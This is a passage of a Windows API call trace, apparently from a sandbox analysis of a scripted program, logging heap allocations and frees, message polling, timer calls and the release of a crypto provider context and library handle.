1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0153.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.946] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0153.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0153.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.946] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0153.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0153.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.947] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0153.947] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0153.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0153.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.949] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0153.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0153.949] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0153.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0153.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0153.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0153.950] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0153.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.950] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.950] FreeLibrary (hLibModule=0x756e0000) returned 1 [0153.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0153.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.951] CloseHandle (hObject=0x2a0) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0153.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0153.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0153.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0153.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0153.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0153.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.953] CloseHandle (hObject=0x2d0) returned 1 [0155.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0155.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0155.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0155.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0155.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0155.401] TranslateMessage (lpMsg=0x8cf708) returned 0 [0155.401] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0155.401] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0155.401] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0155.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0155.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0155.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0155.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0155.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0155.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0155.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee4880 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0155.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0155.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: 